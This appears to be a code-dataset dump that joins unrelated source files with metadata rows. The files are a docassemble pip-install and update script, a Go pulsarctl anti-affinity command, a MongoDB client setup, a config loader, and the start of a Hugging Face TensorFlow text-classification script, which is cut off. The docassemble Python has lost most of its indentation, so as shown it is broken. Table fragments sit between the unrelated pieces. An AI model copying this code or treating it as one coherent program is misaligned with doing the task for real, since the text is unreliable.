results[package.name] = 'pip uninstall command returned success code. See log for details.'
elif returnval == 1:
Install.query.filter_by(hostname=hostname, package_id=package.id).delete()
results[package.name] = 'pip uninstall was not run because the package was not installed.'
else:
results[package.name] = 'pip uninstall command returned failure code'
ok = False
packages_to_delete = list()
sys.stderr.write("check_for_updates: 10 after " + str(time.time() - start_time) + " seconds\n")
for package in to_install:
sys.stderr.write("check_for_updates: going to install a package: " + package.name + "after " + str(time.time() - start_time) + " seconds\n")
# if doing_startup and package.name.startswith('docassemble') and package.name in here_already:
# #adding this because of unpredictability of installing new versions of docassemble
# #just because of a system restart.
# sys.stderr.write("check_for_updates: skipping update on " + str(package.name) + "\n")
# continue
returnval, newlog = install_package(package)
logmessages += newlog
sys.stderr.write("check_for_updates: return value was " + str(returnval) + " after " + str(time.time() - start_time) + " seconds\n")
if returnval != 0:
sys.stderr.write("Return value was not good" + " after " + str(time.time() - start_time) + " seconds\n")
ok = False
#pip._vendor.pkg_resources._initialize_master_working_set()
pip_info = get_pip_info(package.name)
real_name = pip_info['Name']
sys.stderr.write("check_for_updates: real name of package " + str(package.name) + " is " + str(real_name) + "\n after " + str(time.time() - start_time) + " seconds")
if real_name is None:
results[package.name] = 'install failed'
ok = False
if package.name not in here_already:
sys.stderr.write("check_for_updates: removing package entry for " + package.name + " after " + str(time.time() - start_time) + " seconds\n")
packages_to_delete.append(package)
elif returnval != 0:
results[package.name] = 'pip install command returned failure code'
else:
results[package.name] = 'pip install command returned success code. See log for details.'
if real_name != package.name:
sys.stderr.write("check_for_updates: changing name" + " after " + str(time.time() - start_time) + " seconds\n")
package.name = real_name
if package.id in installs:
install = installs[package.id]
install.version = package.version
else:
install = Install(hostname=hostname, packageversion=package.packageversion, version=package.version, package_id=package.id)
db.session.add(install)
db.session.commit()
update_versions()
add_dependencies(package_owner.get(package.id, 1))
update_versions()
sys.stderr.write("check_for_updates: 11 after " + str(time.time() - start_time) + " seconds\n")
for package in packages_to_delete:
db.session.delete(package)
sys.stderr.write("check_for_updates: 12 after " + str(time.time() - start_time) + " seconds\n")
db.session.commit()
sys.stderr.write("check_for_updates: finished uninstalling and installing after " + str(time.time() - start_time) + " seconds\n")
return ok, logmessages, results
def update_versions():
start_time = time.time()
sys.stderr.write("update_versions: starting" + "\n")
from docassemble.base.config import hostname
from docassemble.webapp.app_object import app
from docassemble.webapp.db_object import db
from docassemble.webapp.packages.models import Package, Install, PackageAuth
from docassemble.webapp.daredis import r
install_by_id = dict()
for install in Install.query.filter_by(hostname=hostname).all():
install_by_id[install.package_id] = install
package_by_name = dict()
for package in Package.query.filter_by(active=True).order_by(Package.name, Package.id.desc()).all():
if package.name in package_by_name:
continue
package_by_name[package.name] = Object(id=package.id, packageversion=package.packageversion, name=package.name)
installed_packages = get_installed_distributions()
for package in installed_packages:
if package.key in package_by_name:
if package_by_name[package.key].id in install_by_id and package.version != install_by_id[package_by_name[package.key].id].packageversion:
install_row = Install.query.filter_by(hostname=hostname, package_id=package_by_name[package.key].id).first()
install_row.packageversion = package.version
if package.version != package_by_name[package.key].packageversion:
package_row = Package.query.filter_by(active=True, name=package_by_name[package.key].name).with_for_update().first()
package_row.packageversion = package.version
db.session.commit()
sys.stderr.write("update_versions: ended after " + str(time.time() - start_time) + "\n")
return
def get_home_page_dict():
from docassemble.base.config import daconfig
PACKAGE_DIRECTORY = daconfig.get('packages', '/usr/share/docassemble/local' + str(sys.version_info.major) + '.' + str(sys.version_info.minor))
FULL_PACKAGE_DIRECTORY = os.path.join(PACKAGE_DIRECTORY, 'lib', 'python' + str(sys.version_info.major) + '.' + str(sys.version_info.minor), 'site-packages')
home_page = dict()
for d in os.listdir(FULL_PACKAGE_DIRECTORY):
if not d.startswith('docassemble.'):
continue
metadata_path = os.path.join(d, 'METADATA')
if os.path.isfile(metadata_path):
name = None
url = None
with open(metadata_path, 'rU', encoding='utf-8') as fp:
for line in fp:
if line.startswith('Name: '):
name = line[6:]
elif line.startswith('Home-page: '):
url = line[11:]
break
if name:
home_page[name.lower()] = url
return home_page
def add_dependencies(user_id):
start_time = time.time()
#sys.stderr.write('add_dependencies: user_id is ' + str(user_id) + "\n")
sys.stderr.write("add_dependencies: starting\n")
from docassemble.base.config import hostname
from docassemble.webapp.app_object import app
from docassemble.webapp.db_object import db
from docassemble.webapp.packages.models import Package, Install, PackageAuth
packages_known = set()
for package in Package.query.filter_by(active=True).all():
packages_known.add(package.name)
installed_packages = get_installed_distributions()
home_pages = None
packages_to_add = list()
for package in installed_packages:
if package.key in packages_known:
continue
if package.key.startswith('mysqlclient') or package.key.startswith('mysql-connector') or package.key.startswith('MySQL-python'):
continue
Package.query.filter_by(name=package.key).delete()
packages_to_add.append(package)
if len(packages_to_add):
db.session.commit()
for package in packages_to_add:
package_auth = PackageAuth(user_id=user_id)
if package.key.startswith('docassemble.'):
if home_pages is None:
home_pages = get_home_page_dict()
home_page = home_pages.get(package.key.lower(), None)
if home_page is not None and re.search(r'/github.com/', home_page):
package_entry = Package(name=package.key, package_auth=package_auth, type='git', giturl=home_page, packageversion=package.version, dependency=True)
else:
package_entry = Package(name=package.key, package_auth=package_auth, type='pip', packageversion=package.version, dependency=True)
else:
package_entry = Package(name=package.key, package_auth=package_auth, type='pip', packageversion=package.version, dependency=True)
db.session.add(package_entry)
db.session.commit()
install = Install(hostname=hostname, packageversion=package_entry.packageversion, version=package_entry.version, package_id=package_entry.id)
db.session.add(install)
db.session.commit()
sys.stderr.write("add_dependencies: ending after " + str(time.time() - start_time) + " seconds\n")
return
def fix_names():
from docassemble.webapp.app_object import app
from docassemble.webapp.db_object import db
from docassemble.webapp.packages.models import Package, Install, PackageAuth
installed_packages = [package.key for package in get_installed_distributions()]
for package in Package.query.filter_by(active=True).with_for_update().all():
if package.name not in installed_packages:
pip_info = get_pip_info(package.name)
actual_name = pip_info['Name']
if actual_name is not None:
package.name = actual_name
else:
sys.stderr.write("fix_names: package " + package.name + " does not appear to be installed" + "\n")
db.session.commit()
def splitall(path):
allparts = []
    while True:
parts = os.path.split(path)
if parts[0] == path:
allparts.insert(0, parts[0])
break
elif parts[1] == path:
allparts.insert(0, parts[1])
break
else:
path = parts[0]
allparts.insert(0, parts[1])
return allparts
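# Illustrative note (not in the original source): splitall breaks a path into its
# components by calling os.path.split repeatedly, e.g.
#     splitall('/usr/share/docassemble') == ['/', 'usr', 'share', 'docassemble']
#     splitall('docassemble/base/util.py') == ['docassemble', 'base', 'util.py']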
def install_package(package):
sys.stderr.write("install_package: " + package.name + "\n")
if package.type == 'zip' and package.upload is None:
return 0, ''
from docassemble.base.config import daconfig
from docassemble.webapp.daredis import r
from docassemble.webapp.files import SavedFile
PACKAGE_DIRECTORY = daconfig.get('packages', '/usr/share/docassemble/local' + str(sys.version_info.major) + '.' + str(sys.version_info.minor))
logfilecontents = ''
pip_log = tempfile.NamedTemporaryFile()
temp_dir = tempfile.mkdtemp()
#use_pip_cache = r.get('da:updatepackage:use_pip_cache')
#if use_pip_cache is None:
# disable_pip_cache = False
#elif int(use_pip_cache):
# disable_pip_cache = False
#else:
# disable_pip_cache = True
disable_pip_cache = True
if package.type == 'zip' and package.upload is not None:
saved_file = SavedFile(package.upload, extension='zip', fix=True)
commands = ['pip', 'install']
if disable_pip_cache:
commands.append('--no-cache-dir')
commands.extend(['--quiet', '--prefix=' + PACKAGE_DIRECTORY, '--src=' + temp_dir, '--log-file=' + pip_log.name, '--upgrade', saved_file.path + '.zip'])
elif package.type == 'git' and package.giturl is not None:
if package.gitbranch is not None:
branchpart = '@' + str(package.gitbranch)
else:
branchpart = ''
if package.gitsubdir is not None:
commands = ['pip', 'install']
if disable_pip_cache:
commands.append('--no-cache-dir')
commands.extend(['--quiet', '--prefix=' + PACKAGE_DIRECTORY, '--src=' + temp_dir, '--upgrade', '--log-file=' + pip_log.name, 'git+' + str(package.giturl) + '.git' + branchpart + '#egg=' + package.name + '&subdirectory=' + str(package.gitsubdir)])
else:
commands = ['pip', 'install']
if disable_pip_cache:
commands.append('--no-cache-dir')
commands.extend(['--quiet', '--prefix=' + PACKAGE_DIRECTORY, '--src=' + temp_dir, '--upgrade', '--log-file=' + pip_log.name, 'git+' + str(package.giturl) + '.git' + branchpart + '#egg=' + package.name])
elif package.type == 'pip':
if package.limitation is None:
limit = ""
else:
limit = str(package.limitation)
commands = ['pip', 'install']
if disable_pip_cache:
commands.append('--no-cache-dir')
commands.extend(['--quiet', '--prefix=' + PACKAGE_DIRECTORY, '--src=' + temp_dir, '--upgrade', '--log-file=' + pip_log.name, package.name + limit])
else:
sys.stderr.write("Wrong package type\n")
return 1, 'Unable to recognize package type: ' + package.name
sys.stderr.write("install_package: running " + " ".join(commands) + "\n")
logfilecontents += " ".join(commands) + "\n"
returnval = 1
try:
        subprocess.run(commands, check=True)
returnval = 0
except subprocess.CalledProcessError as err:
returnval = err.returncode
fix_fnctl()
sys.stderr.flush()
sys.stdout.flush()
time.sleep(4)
    with open(pip_log.name, 'r', encoding='utf-8') as x:
logfilecontents += x.read()
pip_log.close()
try:
sys.stderr.write(logfilecontents + "\n")
except:
pass
sys.stderr.flush()
sys.stdout.flush()
time.sleep(4)
sys.stderr.write('returnval is: ' + str(returnval) + "\n")
sys.stderr.write('install_package: done' + "\n")
shutil.rmtree(temp_dir)
return returnval, logfilecontents
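# Illustrative sketch (not in the original source): for a hypothetical git package with
# giturl https://github.com/example/docassemble-demo, no branch and no subdirectory, the
# command list assembled above is roughly:
#   pip install --no-cache-dir --quiet --prefix=/usr/share/docassemble/local3.10 \
#       --src=/tmp/tmpXXXXXX --upgrade --log-file=/tmp/tmpYYYYYY \
#       git+https://github.com/example/docassemble-demo.git#egg=docassemble.demo
# The paths, Python version and package name shown are placeholders; the real values come
# from daconfig, tempfile and the Package row.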
def uninstall_package(package):
sys.stderr.write('uninstall_package: ' + package.name + "\n")
logfilecontents = ''
#sys.stderr.write("uninstall_package: uninstalling " + package.name + "\n")
pip_log = tempfile.NamedTemporaryFile()
commands = ['pip', 'uninstall', '--yes', '--log-file=' + pip_log.name, package.name]
sys.stderr.write("Running " + " ".join(commands) + "\n")
logfilecontents += " ".join(commands) + "\n"
#returnval = pip.main(commands)
try:
        subprocess.run(commands, check=True)
returnval = 0
except subprocess.CalledProcessError as err:
returnval = err.returncode
fix_fnctl()
sys.stderr.flush()
sys.stdout.flush()
time.sleep(4)
sys.stderr.write('Finished running pip' + "\n")
    with open(pip_log.name, 'r', encoding='utf-8') as x:
logfilecontents += x.read()
pip_log.close()
try:
sys.stderr.write(logfilecontents + "\n")
except:
pass
sys.stderr.flush()
sys.stdout.flush()
time.sleep(4)
sys.stderr.write('uninstall_package: done' + "\n")
return returnval, logfilecontents
class Object(object):
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def get_installed_distributions():
start_time = time.time()
sys.stderr.write("get_installed_distributions: starting\n")
results = list()
try:
output = subprocess.check_output(['pip', '--version']).decode('utf-8', 'ignore')
except subprocess.CalledProcessError as err:
output = err.output.decode('utf-8', 'ignore')
sys.stderr.write("get_installed_distributions: pip version:\n" + output)
try:
output = subprocess.check_output(['pip', 'list', '--format=freeze']).decode('utf-8', 'ignore')
except subprocess.CalledProcessError as err:
output = err.output.decode('utf-8', 'ignore')
#sys.stderr.write("get_installed_distributions: result of pip list --format freeze was:\n" + str(output) + "\n")
for line in output.split('\n'):
a = line.split("==")
if len(a) == 2:
results.append(Object(key=a[0], version=a[1]))
sys.stderr.write("get_installed_distributions: ending after " + str(time.time() - start_time) + " seconds\n")
#sys.stderr.write(repr([x.key for x in results]) + "\n")
return results
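# Illustrative note (not in the original source): `pip list --format=freeze` emits one
# "name==version" line per installed distribution, which the loop above splits on "==".
# For example, a line such as
#     docassemble.webapp==1.2.35
# becomes Object(key='docassemble.webapp', version='1.2.35'); lines without exactly one
# "==" (warnings, blank lines) are skipped. The package name and version here are made up.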
def get_pip_info(package_name):
#sys.stderr.write("get_pip_info: " + package_name + "\n")
try:
output = subprocess.check_output(['pip', 'show', package_name]).decode('utf-8', 'ignore')
except subprocess.CalledProcessError as err:
output = ""
sys.stderr.write("get_pip_info: error. output was " + err.output.decode('utf-8', 'ignore') + "\n")
# old_stdout = sys.stdout
# sys.stdout = saved_stdout = StringIO()
# pip.main(['show', package_name])
# sys.stdout = old_stdout
# output = saved_stdout.getvalue()
results = dict()
if not isinstance(output, str):
output = output.decode('utf-8', 'ignore')
for line in output.split('\n'):
#sys.stderr.write("Found line " + str(line) + "\n")
a = line.split(": ")
if len(a) == 2:
#sys.stderr.write("Found " + a[0] + " which was " + a[1] + "\n")
results[a[0]] = a[1]
for key in ['Name', 'Home-page', 'Version']:
if key not in results:
results[key] = None
return results
if __name__ == "__main__":
#import docassemble.webapp.database
from docassemble.webapp.app_object import app
with app.app_context():
from docassemble.webapp.db_object import db
from docassemble.webapp.packages.models import Package, Install, PackageAuth
from docassemble.webapp.daredis import r
#app.config['SQLALCHEMY_DATABASE_URI'] = docassemble.webapp.database.alchemy_connection_string()
if mode == 'initialize':
sys.stderr.write("updating with mode initialize\n")
update_versions()
any_package = Package.query.filter_by(active=True).first()
if any_package is None:
add_dependencies(1)
update_versions()
check_for_updates(doing_startup=True)
remove_inactive_hosts()
else:
sys.stderr.write("updating with mode check_for_updates\n")
check_for_updates()
from docassemble.base.config import daconfig
if USING_SUPERVISOR:
SUPERVISORCTL = daconfig.get('supervisorctl', 'supervisorctl')
container_role = ':' + os.environ.get('CONTAINERROLE', '') + ':'
if re.search(r':(web|celery|all):', container_role):
sys.stderr.write("Sending reset signal\n")
args = [SUPERVISORCTL, '-s', 'http://localhost:9001', 'start', 'reset']
subprocess.run(args)
else:
sys.stderr.write("Not sending reset signal because not web or celery\n")
else:
sys.stderr.write("update: touched wsgi file" + "\n")
wsgi_file = daconfig.get('webapp', '/usr/share/docassemble/webapp/docassemble.wsgi')
if os.path.isfile(wsgi_file):
with open(wsgi_file, 'a'):
os.utime(wsgi_file, None)
db.engine.dispose()
sys.exit(0)
|
[] |
[] |
[
"CONTAINERROLE",
"SUPERVISOR_SERVER_URL"
] |
[]
|
["CONTAINERROLE", "SUPERVISOR_SERVER_URL"]
|
python
| 2 | 0 | |
pkg/ctl/namespace/get_anti_affinity_ns.go
|
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package namespace
import (
"github.com/streamnative/pulsarctl/pkg/cmdutils"
"github.com/streamnative/pulsarctl/pkg/pulsar/common"
"github.com/streamnative/pulsarctl/pkg/pulsar/utils"
"github.com/spf13/cobra"
"github.com/spf13/pflag"
)
func getAntiAffinityNamespaces(vc *cmdutils.VerbCmd) {
desc := cmdutils.LongDescription{}
desc.CommandUsedFor = "Get the list of namespaces in the same anti-affinity group."
desc.CommandPermission = "This command requires tenant admin permissions."
var examples []cmdutils.Example
	getAntiAffinity := cmdutils.Example{
Desc: "Get the list of namespaces in the same anti-affinity group.",
Command: "pulsarctl namespaces get-anti-affinity-namespaces tenant/namespace",
}
	examples = append(examples, getAntiAffinity)
desc.CommandExamples = examples
var out []cmdutils.Output
successOut := cmdutils.Output{
Desc: "normal output",
Out: "(anti-affinity name list)",
}
noNamespaceName := cmdutils.Output{
Desc: "you must specify a tenant/namespace name, please check if the tenant/namespace name is provided",
Out: "[✖] the namespace name is not specified or the namespace name is specified more than one",
}
tenantNotExistError := cmdutils.Output{
Desc: "the tenant does not exist",
Out: "[✖] code: 404 reason: Tenant does not exist",
}
nsNotExistError := cmdutils.Output{
Desc: "the namespace does not exist",
Out: "[✖] code: 404 reason: Namespace (tenant/namespace) does not exist",
}
out = append(out, successOut, noNamespaceName, tenantNotExistError, nsNotExistError)
desc.CommandOutput = out
var data utils.NamespacesData
vc.SetDescription(
"get-anti-affinity-namespaces",
"Get the list of namespaces in the same anti-affinity group.",
desc.ToString(),
desc.ExampleToString(),
"get-anti-affinity-namespaces",
)
vc.SetRunFunc(func() error {
return doGetAntiAffinityNamespaces(vc, data)
})
vc.FlagSetGroup.InFlagSet("Namespaces", func(flagSet *pflag.FlagSet) {
flagSet.StringVarP(
&data.AntiAffinityGroup,
"group",
"g",
"",
"Anti-affinity group name")
flagSet.StringVarP(
&data.Cluster,
"cluster",
"c",
"",
"Cluster name")
flagSet.StringVarP(
&data.Tenant,
"tenant",
"t",
"",
"tenant is only used for authorization. \n"+
"Client has to be admin of any of the tenant to access this api")
cobra.MarkFlagRequired(flagSet, "group")
})
vc.EnableOutputFlagSet()
}
func doGetAntiAffinityNamespaces(vc *cmdutils.VerbCmd, data utils.NamespacesData) error {
admin := cmdutils.NewPulsarClientWithAPIVersion(common.V1)
strList, err := admin.Namespaces().GetAntiAffinityNamespaces(data.Tenant, data.Cluster, data.AntiAffinityGroup)
if err == nil {
vc.Command.Println(strList)
}
return err
}
|
[] |
[] |
[] |
[]
|
[]
|
go
| null | null | null |
db_client/mongodb_client.py
|
from pymongo import MongoClient
from dotenv import load_dotenv
import json
import os
load_dotenv()
JWT_DURATION = os.getenv("JWT_DURATION")
JWT_SECRET = os.getenv("JWT_SECRET")
MONGODB_SRV = os.getenv("MONGODB_SRV")
# Instantiate database object and collection object
client = MongoClient(MONGODB_SRV)
database = client.dev
devices_collection = database.devices
dist_collection = database.distMeasure
color_collection = database.colorMeasure
reso_collection = database.resoMeasure
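# Minimal usage sketch (not part of this module), assuming the collections above exist
# and MONGODB_SRV points at a reachable cluster:
#
#   from db_client.mongodb_client import devices_collection
#   devices_collection.insert_one({"device_id": "demo-001", "status": "online"})
#   doc = devices_collection.find_one({"device_id": "demo-001"})
#
# "demo-001" and the field names are placeholders for illustration only.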
|
[] |
[] |
[
"JWT_SECRET",
"MONGODB_SRV",
"JWT_DURATION"
] |
[]
|
["JWT_SECRET", "MONGODB_SRV", "JWT_DURATION"]
|
python
| 3 | 0 | |
misc/configuration/config.py
|
import os.path
from importlib import import_module
basedir = os.path.abspath(os.path.dirname(__file__))
env = os.getenv('ENVIRONMENT', 'local')
if env not in ['local', 'test']:
config_file = '/path/to/config/directory/' + env + '.py'
if not os.path.isfile(config_file):
env = 'local'
config_name = 'path.to.config.directory.' + env
module = import_module(config_name)
config = module.config
config.MIGRATIONS_PATH = os.path.join(basedir, 'migrations')
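# Illustrative sketch (not part of this module): the module imported above is expected to
# expose a `config` object; a hypothetical local.py under the config directory might look like:
#
#   class Config:
#       DEBUG = True
#       SQLALCHEMY_DATABASE_URI = 'sqlite:///local.db'
#   config = Config()
#
# The attribute names shown are placeholders; only the `config` object itself (plus the
# MIGRATIONS_PATH set above) is assumed by this loader.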
|
[] |
[] |
[
"ENVIRONMENT"
] |
[]
|
["ENVIRONMENT"]
|
python
| 1 | 0 | |
examples/tensorflow/text-classification/run_text_classification.py
|
#!/usr/bin/env python
# coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Fine-tuning the library models for sequence classification."""
# You can also adapt this script on your own text classification task. Pointers for this are left as comments.
import logging
import os
import random
import sys
from dataclasses import dataclass, field
from math import ceil
from pathlib import Path
from typing import Optional
import numpy as np
from datasets import load_dataset
from transformers import (
AutoConfig,
AutoTokenizer,
HfArgumentParser,
PretrainedConfig,
TFAutoModelForSequenceClassification,
TrainingArguments,
set_seed,
)
from transformers.file_utils import CONFIG_NAME, TF2_WEIGHTS_NAME
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1" # Reduce the amount of console output from TF
import tensorflow as tf # noqa: E402
logger = logging.getLogger(__name__)
# region Helper classes
class DataSequence(tf.keras.utils.Sequence):
# We use a Sequence object to load the data. Although it's completely possible to load your data as Numpy/TF arrays
# and pass those straight to the Model, this constrains you in a couple of ways. Most notably, it requires all
# the data to be padded to the length of the longest input example, and it also requires the whole dataset to be
# loaded into memory. If these aren't major problems for you, you can skip the sequence object in your own code!
def __init__(self, dataset, non_label_column_names, batch_size, labels, shuffle=True):
super().__init__()
# Retain all of the columns not present in the original data - these are the ones added by the tokenizer
self.data = {
key: dataset[key]
for key in dataset.features.keys()
if key not in non_label_column_names and key != "label"
}
data_lengths = {len(array) for array in self.data.values()}
assert len(data_lengths) == 1, "Dataset arrays differ in length!"
self.data_length = data_lengths.pop()
self.num_batches = ceil(self.data_length / batch_size)
if labels:
self.labels = np.array(dataset["label"])
assert len(self.labels) == self.data_length, "Labels not the same length as input arrays!"
else:
self.labels = None
self.batch_size = batch_size
self.shuffle = shuffle
if self.shuffle:
# Shuffle the data order
self.permutation = np.random.permutation(self.data_length)
else:
self.permutation = None
def on_epoch_end(self):
# If we're shuffling, reshuffle the data order after each epoch
if self.shuffle:
self.permutation = np.random.permutation(self.data_length)
def __getitem__(self, item):
# Note that this yields a batch, not a single sample
batch_start = item * self.batch_size
batch_end = (item + 1) * self.batch_size
if self.shuffle:
data_indices = self.permutation[batch_start:batch_end]
else:
            data_indices = np.arange(batch_start, min(batch_end, self.data_length))
# We want to pad the data as little as possible, so we only pad each batch
# to the maximum length within that batch. We do that by stacking the variable-
# length inputs into a ragged tensor and then densifying it.
batch_input = {
key: tf.ragged.constant([data[i] for i in data_indices]).to_tensor() for key, data in self.data.items()
}
if self.labels is None:
return batch_input
else:
batch_labels = self.labels[data_indices]
return batch_input, batch_labels
def __len__(self):
return self.num_batches
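# Illustrative note (not part of the original script): the per-batch dynamic padding in
# __getitem__ relies on tf.ragged.constant(...).to_tensor(), which zero-pads each row only
# to the longest row in that batch. For two hypothetical token-id lists:
#
#   import tensorflow as tf
#   tf.ragged.constant([[101, 2023, 102], [101, 102]]).to_tensor()
#   # -> [[101, 2023, 102],
#   #     [101,  102,   0]]
#
# so shorter batches never pay for the longest sequence in the whole dataset.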
class SavePretrainedCallback(tf.keras.callbacks.Callback):
# Hugging Face models have a save_pretrained() method that saves both the weights and the necessary
# metadata to allow them to be loaded as a pretrained model in future. This is a simple Keras callback
# that saves the model with this method after each epoch.
def __init__(self, output_dir, **kwargs):
super().__init__()
self.output_dir = output_dir
def on_epoch_end(self, epoch, logs=None):
self.model.save_pretrained(self.output_dir)
# endregion
# region Command-line arguments
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
Using `HfArgumentParser` we can turn this class
into argparse arguments to be able to specify them on
the command line.
"""
train_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the training data."}
)
validation_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the validation data."}
)
test_file: Optional[str] = field(default=None, metadata={"help": "A csv or a json file containing the test data."})
max_seq_length: int = field(
default=128,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached preprocessed datasets or not."}
)
pad_to_max_length: bool = field(
default=False,
metadata={
"help": "Whether to pad all samples to `max_seq_length`. "
"If False, will pad the samples dynamically when batching to the maximum length in the batch."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
max_predict_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of predict examples to this "
"value if set."
},
)
def __post_init__(self):
train_extension = self.train_file.split(".")[-1].lower() if self.train_file is not None else None
validation_extension = (
self.validation_file.split(".")[-1].lower() if self.validation_file is not None else None
)
test_extension = self.test_file.split(".")[-1].lower() if self.test_file is not None else None
extensions = {train_extension, validation_extension, test_extension}
extensions.discard(None)
assert len(extensions) != 0, "Need to supply at least one of --train_file, --validation_file or --test_file!"
assert len(extensions) == 1, "All input files should have the same file extension, either csv or json!"
assert "csv" in extensions or "json" in extensions, "Input files should have either .csv or .json extensions!"
self.input_file_extension = extensions.pop()
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
# endregion
def main():
# region Argument parsing
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
output_dir = Path(training_args.output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
# endregion
# region Checkpoints
# Detecting last checkpoint.
checkpoint = None
if len(os.listdir(training_args.output_dir)) > 0 and not training_args.overwrite_output_dir:
if (output_dir / CONFIG_NAME).is_file() and (output_dir / TF2_WEIGHTS_NAME).is_file():
checkpoint = output_dir
logger.info(
f"Checkpoint detected, resuming training from checkpoint in {training_args.output_dir}. To avoid this"
" behavior, change the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
else:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to continue regardless."
)
# endregion
# region Logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger.setLevel(logging.INFO)
logger.info(f"Training/evaluation parameters {training_args}")
# endregion
# region Loading data
# For CSV/JSON files, this script will use the 'label' field as the label and the 'sentence1' and optionally
# 'sentence2' fields as inputs if they exist. If not, the first two fields not named label are used if at least two
# columns are provided. Note that the term 'sentence' can be slightly misleading, as they often contain more than
# a single grammatical sentence, when the task requires it.
#
# If the CSVs/JSONs contain only one non-label column, the script does single sentence classification on this
# single column. You can easily tweak this behavior (see below)
#
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
data_files = {"train": data_args.train_file, "validation": data_args.validation_file, "test": data_args.test_file}
data_files = {key: file for key, file in data_files.items() if file is not None}
for key in data_files.keys():
logger.info(f"Loading a local file for {key}: {data_files[key]}")
if data_args.input_file_extension == "csv":
# Loading a dataset from local csv files
datasets = load_dataset("csv", data_files=data_files, cache_dir=model_args.cache_dir)
else:
# Loading a dataset from local json files
datasets = load_dataset("json", data_files=data_files, cache_dir=model_args.cache_dir)
# See more about loading any type of standard or custom dataset at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# endregion
# region Label preprocessing
# If you've passed us a training set, we try to infer your labels from it
if "train" in datasets:
# By default we assume that if your label column looks like a float then you're doing regression,
# and if not then you're doing classification. This is something you may want to change!
is_regression = datasets["train"].features["label"].dtype in ["float32", "float64"]
if is_regression:
num_labels = 1
else:
# A useful fast method:
# https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique
label_list = datasets["train"].unique("label")
label_list.sort() # Let's sort it for determinism
num_labels = len(label_list)
# If you haven't passed a training set, we read label info from the saved model (this happens later)
else:
num_labels = None
label_list = None
is_regression = None
# endregion
# region Load pretrained model and tokenizer
# Set seed before initializing model
set_seed(training_args.seed)
#
# In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
if checkpoint is not None:
config_path = training_args.output_dir
elif model_args.config_name:
config_path = model_args.config_name
else:
config_path = model_args.model_name_or_path
if num_labels is not None:
config = AutoConfig.from_pretrained(
config_path,
num_labels=num_labels,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
else:
config = AutoConfig.from_pretrained(
config_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
if checkpoint is None:
model_path = model_args.model_name_or_path
else:
model_path = checkpoint
model = TFAutoModelForSequenceClassification.from_pretrained(
model_path,
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
# endregion
# region Optimizer, loss and compilation
optimizer = tf.keras.optimizers.Adam(
learning_rate=training_args.learning_rate,
